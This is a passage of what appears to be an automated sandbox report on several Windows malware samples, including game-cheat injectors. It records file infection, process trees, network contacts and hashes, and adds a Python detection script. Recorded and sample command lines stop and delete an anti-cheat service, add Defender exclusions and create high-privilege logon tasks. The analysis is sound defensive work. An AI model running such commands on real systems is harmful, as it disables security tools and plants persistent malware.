| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\Integrator.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\SELFCERT.EXE | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\servertool.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File created | C:\Program Files (x86)\MTA San Andreas 1.6\server\mods\deathmatch\deathmatch.dll | C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseAP.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jdeps.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Source Engine\OSE.EXE | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\Classification\SenseCE.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\klist.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\orbd.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jjs.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\uninstall.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jar.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zFM.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\firefox.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\vlc.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\msoia.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseImdsCollector.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\rmid.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSOUC.EXE | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseAPToast.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateComRegisterShell64.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jmap.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PerfBoost.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AppSharingHookController.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\minidump-analyzer.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Exterm.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Exterm.exe"
C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe
"C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe"
C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe
C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop FairplayKD >nul
C:\Windows\SysWOW64\sc.exe
sc stop FairplayKD
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete FairplayKD >nul
C:\Windows\SysWOW64\sc.exe
sc delete FairplayKD
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop FairplayKD1 >nul
C:\Windows\SysWOW64\sc.exe
sc stop FairplayKD1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete FairplayKD1 >nul
C:\Windows\SysWOW64\sc.exe
sc delete FairplayKD1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\28f16f29.bat" "
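Three of the process lists in this report show short command-line patterns that are easy to match without any of the packers' internals: an `Add-MpPreference -ExclusionPath` call followed by a `schtasks /Create ... /SC ONLOGON ... /RL HIGHEST` task for the same `$`-prefixed binary in System32 (the first run above, repeated for $Node32, $Node2Json and $Node3Json), `rundll32.exe ...Dragon.dll,#1` loading a DLL by export ordinal (behavioral3), and `sc stop` / `sc delete` against FairplayKD and FairplayKD1 (behavioral5). The Python below is an added example of detection logic run over such command lines; it is not code from the report or from the sample. The sample lines are copied from the process lists above, with one benign svchost line included as a control, and the rule names are this example's own.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample: command lines copied from the process lists in this report, in the
# order the sandbox recorded them, plus one benign svchost line as a control.
SAMPLE_COMMAND_LINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node32.exe"',
    r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node32.exe'""",
    r'"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node32" /SC ONLOGON /TR "C:\Windows\System32\$Node32.exe" /RL HIGHEST',
    r'"C:\Windows\System32\$Node32.exe"',
    r'rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Dragon.dll,#1',
    r'C:\Windows\system32\cmd.exe /c sc stop FairplayKD >nul',
    r'sc stop FairplayKD',
    r'sc delete FairplayKD',
    r'C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv',
]

# Rule names below are this example's own, not sandbox signature names.
RULES: list[tuple[str, re.Pattern[str]]] = [
    # Defender exclusion added from the command line.
    ("defender_exclusion_added",
     re.compile(r"Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)\b", re.I)),
    # Logon-triggered scheduled task that runs with highest privileges.
    ("logon_task_highest_privilege",
     re.compile(r'schtasks(?:\.exe)?"?\s+/Create\b.*?/SC\s+ONLOGON\b.*?/RL\s+HIGHEST\b', re.I)),
    # A '$'-prefixed executable referenced directly under System32.
    ("dollar_prefixed_system32_binary", re.compile(r"\\System32\\\$[^\\]+?\.exe", re.I)),
    # DLL loaded through rundll32 by export ordinal (",#N") rather than by export name.
    ("rundll32_ordinal_export", re.compile(r"\brundll32(?:\.exe)?\s+.+\.dll,#\d+", re.I)),
    # Service stopped or deleted through sc.exe.
    ("service_stopped_or_deleted", re.compile(r"\bsc(?:\.exe)?\s+(?:stop|delete)\s+\S+", re.I)),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    evidence: str  # the fragment of the command line that matched


def scan_command_line(cmdline: str) -> list[Finding]:
    """Run every rule over one command line; a single line may trip several rules."""
    return [Finding(name, m.group(0)) for name, rx in RULES if (m := rx.search(cmdline))]


def scan_process_list(cmdlines: list[str]) -> dict[str, list[str]]:
    """Map each rule name to the command lines that tripped it, across a whole process tree."""
    hits: dict[str, list[str]] = {}
    for line in cmdlines:
        for finding in scan_command_line(line):
            hits.setdefault(finding.rule, []).append(line)
    return hits


EXCLUSION_PATH = re.compile(r"-ExclusionPath\s+'([^']+)'", re.I)
TASK_TARGET = re.compile(r'/TR\s+"([^"]+)"', re.I)


def correlate_exclusion_with_task(cmdlines: list[str]) -> list[str]:
    """Paths first excluded from Defender and later registered as a scheduled-task target.

    Either action alone has legitimate uses; the same path in both, in that order, is the
    sequence this report records three times.
    """
    first_excluded: dict[str, int] = {}
    for i, line in enumerate(cmdlines):
        m = EXCLUSION_PATH.search(line)
        if m:
            first_excluded.setdefault(m.group(1).lower(), i)
    chained: list[str] = []
    for i, line in enumerate(cmdlines):
        m = TASK_TARGET.search(line)
        if m and first_excluded.get(m.group(1).lower(), i) < i:
            chained.append(m.group(1))
    return chained


if __name__ == "__main__":
    for rule, lines in scan_process_list(SAMPLE_COMMAND_LINES).items():
        print(rule, len(lines))
    print(correlate_exclusion_with_task(SAMPLE_COMMAND_LINES))
```

The per-line rules are noisy on their own (administrators do add exclusions and create logon tasks); the correlation in `correlate_exclusion_with_task` is the part worth alerting on, because it ties the exclusion to the binary that is then made persistent and executed.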
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ddos.dnsnb8.net | udp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | 105.84.221.44.in-addr.arpa | udp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
memory/5056-0-0x00007FFC2D8C3000-0x00007FFC2D8C5000-memory.dmp
memory/5056-1-0x0000000000BC0000-0x0000000000C96000-memory.dmp
memory/5056-5-0x00007FFC2D8C0000-0x00007FFC2E382000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe
| MD5 | 16d4eec72ee69f6acae5a362488dcac7 |
| SHA1 | 014d4b32236bc6dc648aeddf6819e1e0e62718d8 |
| SHA256 | d2d80e8ba8030df48bd0c485ec83b5bdf3c500cb84cdaca664e9fb6b1b4b6c9f |
| SHA512 | 1f320a07d98ce30f693429869830341e789c6ca2dc95d6fc148f5ddb141793cc877ad8cab9459af2caac1919a1ae245c12ce0f1ee2bed0f01c06eddb734cc61c |
memory/2724-15-0x0000000000300000-0x0000000000319000-memory.dmp
memory/5056-17-0x00007FFC2D8C0000-0x00007FFC2E382000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe
| MD5 | 56b2c3810dba2e939a8bb9fa36d3cf96 |
| SHA1 | 99ee31cd4b0d6a4b62779da36e0eeecdd80589fc |
| SHA256 | 4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07 |
| SHA512 | 27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e |
memory/4396-22-0x0000000000210000-0x0000000000219000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8TO9EJAY\k2[1].rar
| MD5 | d3b07384d113edec49eaa6238ad5ff00 |
| SHA1 | f1d2d2f924e986ac86fdf7b36c94bcdf32beec15 |
| SHA256 | b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c |
| SHA512 | 0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6 |
C:\Users\Admin\AppData\Local\Temp\64817387.exe
| MD5 | 20879c987e2f9a916e578386d499f629 |
| SHA1 | c7b33ddcc42361fdb847036fc07e880b81935d5d |
| SHA256 | 9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31 |
| SHA512 | bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f |
C:\Users\Admin\AppData\Local\Temp\28f16f29.bat
| MD5 | 98b41a3e68bb337885a2fdee8e6f5284 |
| SHA1 | fa22db051a62f12c0acc3dab0d3f56611c75c4d1 |
| SHA256 | fe94f2597c808ee5490802a2bebddcd98e22de05b3a5e768398400a1a91b1db6 |
| SHA512 | cd63838ceda384dcfd2d21823ba0418e03976857f981b307a42d28d76b0e63715b854bbcb3a972bec2f735b40469bfd883be3229ef7b7de1f4a3ac9249cd67bf |
Analysis: behavioral8
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
149s
Max time network
157s
Signatures
VMProtect packed file
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DeadlySafe.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DeadlySafe.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DeadlySafe.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DeadlySafe.exe"
Analysis: behavioral16
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
92s
Max time network
151s
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node63.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node63.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node63.exe"
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Analysis: behavioral12
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
97s
Max time network
144s
Signatures
VMProtect packed file
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_vbrSafe.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_vbrSafe.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_vbrSafe.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_vbrSafe.exe"
Analysis: behavioral20
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
149s
Max time network
152s
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\RobloxExploit.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\$MontanaRoblox\MontanaExecutor.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\$MontanaRoblox\MontanaExecutor.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\$MontanaRoblox\MontanaExecutor.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\$MontanaRoblox\MontanaExecutor.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\$MontanaRoblox\MontanaExecutor.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\$MontanaRoblox\MontanaExecutor.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2228 wrote to memory of 4752 | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\RobloxExploit.exe | C:\$MontanaRoblox\MontanaExecutor.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\RobloxExploit.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\RobloxExploit.exe"
C:\$MontanaRoblox\MontanaExecutor.exe
"C:\$MontanaRoblox\MontanaExecutor.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
Files
C:\$MontanaRoblox\MontanaExecutor.exe
| MD5 | dabf953588aa169685126dde24d55251 |
| SHA1 | b9590c74690b23299f0bad3c1efc20cafbc0c6c5 |
| SHA256 | 4bb72a438218807b830f27c6525d46e840fb012b8cb40fc62c78d59e70fd0216 |
| SHA512 | 541cefa2536a0e7ed3e047a08d425908f42cf8466ed4f5badbc579ea1d2a4e11feebbee9e573350209a399739ced24990124d354c634e648a091ed78f8c254ce |
C:\$MontanaRoblox\MontanaExecutor.exe.config
| MD5 | b1f8f837fddfb84d7aeef9e31ff6b4e8 |
| SHA1 | 4901c36feba3900eaa7455c5a4a983d3a0242723 |
| SHA256 | f8d8a1dd30f16ecf136589b99d47653bcde6a2d6cf7b4917001feb6d4da1d447 |
| SHA512 | 7111bf52eeecf1e5cdb3f346da28902973ea1f10a588665e2a5ab3be2a71b89b7184fb24e751e9b5980f825d3120a274f0bbf67e183ef1430dd96eb7dacd5120 |
C:\$MontanaRoblox\Guna.UI2.dll
| MD5 | c19e9e6a4bc1b668d19505a0437e7f7e |
| SHA1 | 73be712aef4baa6e9dabfc237b5c039f62a847fa |
| SHA256 | 9ac8b65e5c13292a8e564187c1e7446adc4230228b669383bd7b07035ab99a82 |
| SHA512 | b6cd0af436459f35a97db2d928120c53d3691533b01e4f0e8b382f2bd81d9a9a2c57e5e2aa6ade9d6a1746d5c4b2ef6c88d3a0cf519424b34445d0d30aab61de |
C:\$MontanaRoblox\FastColoredTextBox.dll
| MD5 | 4719b02693486f3610a0cba3f88e3719 |
| SHA1 | ff4335aacf19037c3879d371788650d1681e5dd1 |
| SHA256 | a19bf2722cef29430e75f09c1f7a17baf456ccaed16ec6584f417d03214598f3 |
| SHA512 | 3980726c6ce280973089b38c81242ddb5f22713abb66072df43bfd58eb9d2c476540475cfae2105a2109452e5cadaca310df99d3cf673d8335f2ba0f743d9b72 |
C:\$MontanaRoblox\ForlornApi.dll
| MD5 | 31f7684cd01d453008660da9e52f4030 |
| SHA1 | 53f8165a98f4cb4d8b23bb9610389bac3d058595 |
| SHA256 | 6c7c6ccd328826aee998c826e2666441224f7d158dfe71b2c3270b0dbf8970aa |
| SHA512 | de512c844b4a76c27216082cefe76482e93d74dcf34e134bd7e3ff4bfc852d3e3b5acd24ce0cee2eadc943ad84471198f383a5cc83b03fb68e1b389057e01d47 |
Analysis: behavioral27
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
97s
Max time network
141s
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo7I.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo7I.exe"
Analysis: behavioral23
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
149s
Max time network
157s
Signatures
Executes dropped EXE
Reads user/profile data of web browsers
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\AppVClient.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Windows\system32\msiexec.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Windows\System32\SensorDataService.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Windows\System32\alg.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe | N/A |
| File opened for modification | C:\Windows\system32\msiexec.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe | N/A |
| File opened for modification | C:\Windows\system32\dllhost.exe | C:\Windows\system32\TieringEngineService.exe | N/A |
| File opened for modification | C:\Windows\system32\SgrmBroker.exe | C:\Windows\System32\vds.exe | N/A |
| File opened for modification | C:\Windows\System32\snmptrap.exe | C:\Windows\system32\wbem\WmiApSrv.exe | N/A |
| File opened for modification | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | C:\Windows\System32\alg.exe | N/A |
| File opened for modification | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Windows\system32\AppVClient.exe | C:\Windows\system32\TieringEngineService.exe | N/A |
| File opened for modification | C:\Windows\System32\vds.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | C:\Windows\system32\wbengine.exe | N/A |
| File opened for modification | C:\Windows\System32\OpenSSH\ssh-agent.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Windows\system32\fxssvc.exe | C:\Windows\System32\snmptrap.exe | N/A |
| File opened for modification | C:\Windows\system32\SgrmBroker.exe | C:\Windows\system32\wbengine.exe | N/A |
| File opened for modification | C:\Windows\system32\SgrmBroker.exe | C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe | N/A |
| File opened for modification | C:\Windows\System32\snmptrap.exe | C:\Windows\system32\TieringEngineService.exe | N/A |
| File opened for modification | C:\Windows\System32\OpenSSH\ssh-agent.exe | C:\Windows\System32\vds.exe | N/A |
| File opened for modification | C:\Windows\system32\AppVClient.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Windows\system32\msiexec.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\4f490c8b76bd8ed3.bin | C:\Windows\System32\alg.exe | N/A |
| File opened for modification | C:\Windows\system32\SearchIndexer.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe | N/A |
| File opened for modification | C:\Windows\system32\msiexec.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Windows\system32\fxssvc.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | C:\Windows\system32\TieringEngineService.exe | N/A |
| File opened for modification | C:\Windows\system32\fxssvc.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\system32\AgentService.exe | \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE | N/A |
| File opened for modification | C:\Windows\system32\dllhost.exe | \??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE | N/A |
| File opened for modification | C:\Windows\system32\AppVClient.exe | C:\Windows\system32\locator.exe | N/A |
| File opened for modification | C:\Windows\system32\dllhost.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Windows\system32\SgrmBroker.exe | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe | N/A |
| File opened for modification | C:\Windows\system32\AgentService.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\System32\msdtc.exe | C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe | N/A |
| File opened for modification | C:\Windows\system32\fxssvc.exe | C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe | N/A |
| File opened for modification | C:\Windows\system32\msiexec.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\system32\SgrmBroker.exe | C:\Windows\System32\alg.exe | N/A |
| File opened for modification | C:\Windows\system32\SgrmBroker.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\system32\dllhost.exe | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | N/A |
| File opened for modification | C:\Windows\System32\SensorDataService.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\system32\AgentService.exe | C:\Windows\system32\vssvc.exe | N/A |
| File opened for modification | C:\Windows\System32\SensorDataService.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\WmiApSrv.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe | N/A |
| File opened for modification | C:\Windows\system32\TieringEngineService.exe | C:\Windows\system32\SearchIndexer.exe | N/A |
| File opened for modification | C:\Windows\system32\SgrmBroker.exe | C:\Windows\System32\msdtc.exe | N/A |
| File opened for modification | C:\Windows\system32\AgentService.exe | C:\Windows\System32\alg.exe | N/A |
| File opened for modification | C:\Windows\system32\locator.exe | C:\Windows\system32\wbengine.exe | N/A |
| File opened for modification | C:\Windows\System32\vds.exe | C:\Windows\System32\alg.exe | N/A |
| File opened for modification | C:\Windows\system32\AppVClient.exe | C:\Windows\system32\spectrum.exe | N/A |
| File opened for modification | C:\Windows\system32\AgentService.exe | C:\Windows\system32\wbengine.exe | N/A |
| File opened for modification | C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | C:\Windows\system32\vssvc.exe | N/A |
| File opened for modification | C:\Windows\system32\fxssvc.exe | C:\Windows\System32\vds.exe | N/A |
